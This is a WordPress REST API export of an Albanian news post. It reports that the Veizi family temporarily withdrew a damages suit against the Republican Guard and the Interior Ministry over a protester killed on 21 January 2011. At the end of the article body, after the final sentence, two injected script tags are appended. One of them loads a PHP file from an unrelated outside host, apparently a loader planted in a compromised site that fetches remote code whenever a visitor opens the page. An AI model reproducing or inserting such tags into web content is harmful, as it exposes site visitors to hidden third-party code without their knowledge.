{"id":1398,"date":"2016-04-26T15:49:00","date_gmt":"2016-04-26T13:49:00","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=1398"},"modified":"2016-04-26T15:49:00","modified_gmt":"2016-04-26T13:49:00","slug":"familja-veizi-terhiqet-perkohesisht-nga-gjyqi-kunder-gardes-se-republikes-dhe-ministrise-se-brendshme","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=1398","title":{"rendered":"Familja Veizi t\u00ebrhiqet p\u00ebrkoh\u00ebsisht nga gjyqi kund\u00ebr Gard\u00ebs s\u00eb Republik\u00ebs dhe Ministris\u00eb s\u00eb Brendshme"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/familja-veizi-terhiqet-perkohesisht-nga-gjyqi-kunder-gardes-se-republikes-dhe-ministrise-se-brendshme\/ziver_veizi_vrasja\/\" rel=\"attachment wp-att-1399\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignleft size-medium wp-image-1399\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2016\/04\/ziver_veizi_vrasja-300x237.gif\" alt=\"ziver_veizi_vrasja\" width=\"300\" height=\"237\" \/><\/a>N\u00eb seanc\u00ebn e sotme, Alma Rredhi, ish bashk\u00ebshortja e t\u00eb ndjerit Ziver Veizi dhe n\u00ebna e Klajdi dhe Ana Veizit, k\u00ebrkoi nga gjykata administrative pushimin e gjykimit. Pas d\u00ebshtimit t\u00eb gjetjes s\u00eb zgjidhjes me pajtim nga grupi i pun\u00ebs s\u00eb ngritur nga Kryeministri, padia u ngrit n\u00eb muajin Mars 2016 me ndihm\u00eb t\u00eb Res Publica, me objekt shp\u00ebrblimin e d\u00ebmit t\u00eb shkaktuar nga humbja e jet\u00ebs s\u00eb Ziver Veizit n\u00eb protest\u00ebn e 21 Janarit 2011.<\/p>\n<p>Edhe n\u00eb k\u00ebt\u00eb seanc\u00eb, nj\u00eblloj si n\u00eb \u00e7\u00ebshtjen e familjes s\u00eb t\u00eb ndjerit Faik Myrtaj zhvilluar pak dit\u00eb m\u00eb par\u00eb, p\u00ebrfaq\u00ebsues t\u00eb Gard\u00ebs s\u00eb Republik\u00ebs dhe Avokatur\u00ebs s\u00eb Shtetit pran\u00eb Ministris\u00eb s\u00eb Pun\u00ebve t\u00eb Brendshme kishin dor\u00ebzuar prap\u00ebsimet duke k\u00ebrkuar nga gjykata rr\u00ebzimin e padis\u00eb. Sipas tyre Garda e Republik\u00ebs nuk duhej t\u00eb mbante p\u00ebrgjegj\u00ebsi p\u00ebr vrasjen e 4 demonstruesve paq\u00ebsor\u00eb m\u00eb 21 Janar 2011.<\/p>\n<p>Por, p\u00ebrpara se ata t\u00eb lexonin para gjykat\u00ebs materialin q\u00eb kishin dor\u00ebzuar n\u00eb sekretari, p\u00ebrfaq\u00ebsuesja e familjes Veizi, nj\u00ebkoh\u00ebsisht personi q\u00eb kishte autorizuar avokat\u00ebt me prokur\u00eb t\u00eb posa\u00e7me, u t\u00ebrhoq nga kjo padi. T\u00ebrheqja \u00ebsht\u00eb e p\u00ebrkohshme dhe se padia mund t\u00eb ngrihet p\u00ebrs\u00ebri brenda afateve, pasi ajo t\u00eb jet\u00eb konsultuar me f\u00ebmij\u00ebt, t\u00eb cil\u00ebt tashm\u00eb jan\u00eb rritur dhe duhet t\u00eb vendosin vet\u00eb p\u00ebr fatin e k\u00ebsaj \u00e7\u00ebshtjeje.<\/p>\n<p>Nd\u00ebrkoh\u00eb, n\u00eb Gjykat\u00ebn Administrative vazhdon gjykimi i padis\u00eb s\u00eb familjes Myrtaj.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>N\u00eb seanc\u00ebn e sotme, Alma Rredhi, ish bashk\u00ebshortja e t\u00eb ndjerit Ziver Veizi dhe n\u00ebna e Klajdi dhe Ana Veizit, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1399,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1398"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1398"}],"version-history":[{"count":2,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1398\/revisions"}],"predecessor-version":[{"id":1401,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1398\/revisions\/1401"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/1399"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1398"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}